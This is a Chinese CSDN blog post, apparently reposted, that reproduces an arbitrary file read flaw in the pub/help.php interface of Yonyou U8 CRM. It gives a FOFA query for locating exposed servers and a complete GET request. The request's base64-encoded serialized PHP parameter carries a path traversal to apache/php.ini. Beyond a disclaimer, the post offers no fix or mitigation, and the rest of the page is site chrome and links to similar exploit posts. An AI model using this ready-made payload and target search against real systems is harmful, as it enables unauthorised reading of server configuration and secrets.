用友crm客户关系管理pub/help.php接口存在任意文件读取漏洞

于 2024-08-19 13:17:28 发布
阅读量240 收藏 2
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141322853
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 用友crm客户关系管理简介

用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。

2.漏洞描述

用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。用友crm pub/help.php接口存在任意文件读取漏洞

3.影响版本

用友U8 CRM

4.fofa查询语句

body="用友 U8CRM"

5.漏洞复现

漏洞链接:

http://xx.xx.xx.xx/pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9

漏洞数据包

GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1
Host: xx.xx.xx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

 

 

 

转载自:南风漏洞复现文库

外道・輪廻天生
关注
  • 11
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友crm客户关系管理pub/help2.php接口存在任意文件读取漏洞 附POC
nnn2188185的博客
12-20 623
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
用友crm客户关系管理pub/help2.php接口任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-21 443
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。用友crm pub/help2.php接口存在任意文件读取漏洞
用友 CRM help2.php存在任意文件读取漏洞
3tefanie丶zhou的博客
12-19 734
【天底下喜欢讲道理的人,大致可以分为两种,一种是为了让自己心里好受,一种是希望让世道好过。】
用友U8CRM help2.php 任意文件读取漏洞复现
01-23 636
用友U8CRM是一款针对代理销售服务行业设计的管理软件,它集客户关系管理CRM)、呼叫中心和办公自动化(OA)核心应用于一体,提供前端营销、后端业务处理及员工管理的一体化解决方案。
用友T6-CRM客户关系管理安装手册.pdf
07-26
该手册详细介绍了用友T6-CRM客户关系管理系统的安装过程,包括安装配置、数据库选择和系统文件安装等三个步骤。安装前需要确认安装光盘包含的内容,包括用友T6-CRM安装包、MSDE2000数据库安装包、SQL Express2005...
用友T6客户关系管理软件详细介绍.pptx
09-22
用友T6客户关系管理软件是一款针对成长型中小企业设计的专业CRM解决方案。该软件旨在通过集成化的客户资源管理、全方位的市场营销平台、精确的销售流程控制以及高效的服务营销管理,帮助企业提升客户关系管理的效能...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友T3客户通CRM软件产品介绍全.ppt
11-13
用友T3客户通CRM软件产品是一款专门为中小型企业量身定制的客户关系管理软件(CRM)。它按照客户细分情况有效地组织企业资源,培养以客户为中心的经营行为和实施以客户为中心的业务流程,并以此为手段来提高企业的...
2021-2022年收藏的精品资料CRM客户关系管理相关技术介绍.pptx
09-25
### CRM客户关系管理概述 #### CRM的基本概念 - **产生背景**:随着市场竞争加剧,企业需要从注重产品转向注重客户需求,实现从产品导向到客户导向的转变。这种转变要求企业不仅要关注产品的销售,还要重视客户关系...
用友T3客户通CRM软件产品介绍V20.ppt
11-12
用友T3客户通是一款针对小型和微型企业的CRM客户关系管理)软件,旨在帮助这些企业更好地管理和优化其客户资源,提升销售业绩,增强客户满意度和忠诚度。这款产品是用友公司T3系列的一部分,与T1系列的商贸宝、...
用友账套数据文件信息读取.exe
04-15
账套数据文件信息读取.exe
37.用友CRM解决方案(PPT格式).rar
最新发布
05-13
用友CRM解决方案是一个针对企业客户关系管理需求而设计的综合性数字化解决方案。该方案以客户为中心,通过提供一系列功能模块,帮助企业实现客户数据整合、销售流程自动化、市场营销策略优化以及客户服务提升等目标...
用友T6-客户关系管理安装手册.doc
10-01
用友T6-客户关系管理安装手册】详解 用友T6-客户关系管理系统是一款为企业提供全面客户管理和销售流程优化的软件。本手册详细介绍了该系统的安装过程,旨在帮助用户顺利进行安装和配置。 一、简介 用友T6-客户...
用友NCCRM客户关系管理系统介绍.ppt
09-28
用友NCCRM客户关系管理系统】是一款由北京用友软件股份有限公司分销与CRM事业部推出的客户关系管理软件,旨在帮助企业凝聚客户关系,提升资源价值。CRM(Customer Relationship Management)是现代企业管理的重要...
用友小型客户关系管理应用方案 crm
03-09
用友小型客户关系管理应用方案 CRM】是一个针对中小企业设计的高效客户管理工具,旨在帮助企业提升营销能力,把握商机,优化业务流程,并实现客户资源的有效管理和最大化利用。CRM的核心概念是客户价值管理,通过...
用友主数据管理解决方案.ppt
10-16
用友主数据管理解决方案 用友主数据管理解决方案是企业级的主数据管理解决方案,旨在帮助企业解决主数据管理问题,提高业务效率和决策效率。该解决方案通过集成多个系统和数据库,提供统一的主数据视图,帮助企业...
37.用友CRM解决方案.ppt.rar
04-25
该方案在《用友CRM解决方案.ppt.rar》文件中得到了详尽的阐述,此压缩包内包含了多个幻灯片文件,为理解用友如何通过客户关系管理(CRM)助力企业实现数字转型提供了全面的视角。在当前的商业环境中,企业正面临着日益...
用友CRM在汽车贸易行业的应用.pptx
09-22
用友CRM在汽车贸易行业的应用.pptx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值